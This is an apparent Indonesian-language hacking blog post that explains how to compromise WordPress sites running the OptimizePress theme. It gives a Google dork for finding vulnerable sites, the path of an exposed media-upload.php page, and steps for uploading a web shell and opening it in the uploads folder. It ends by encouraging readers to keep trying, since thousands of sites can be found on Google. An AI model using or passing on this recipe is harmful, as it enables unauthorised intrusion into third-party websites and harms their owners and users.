[+] BAHAN [+]
1. Shell
2. Kesabaran :D
3. Dork : inurl:/wp-content/themes/OptimizePress/lib/admin/media-upload.php ( Bisa kalian kembangin lagi )
[+] PoC [+]
1. Ketikan dork ke google
2. Jika sudah memilih salah satu website, kasih exploit :
"localhost/path/wp-content/themes/OptimizePress/lib/admin/media-upload.php"maka hasilnya akan seperti ini :
3. Setelah itu scroll ke bawah sampai ketemu tempat upload shell, lalu upload shell kalian. Jika berhasil akan muncul seperti dibawah ini.
4. Sekarang buka url yang muncul tadi di path
"/home/path/public_html/wp-content/uploads/optpress/images_comingsoon/"
Nah udah tuh cuma itu aja, kalau belum juga dapat sabar aja ya masih ada ribuan web di google kok :)
Thanks !
Author : Bimo Septiawan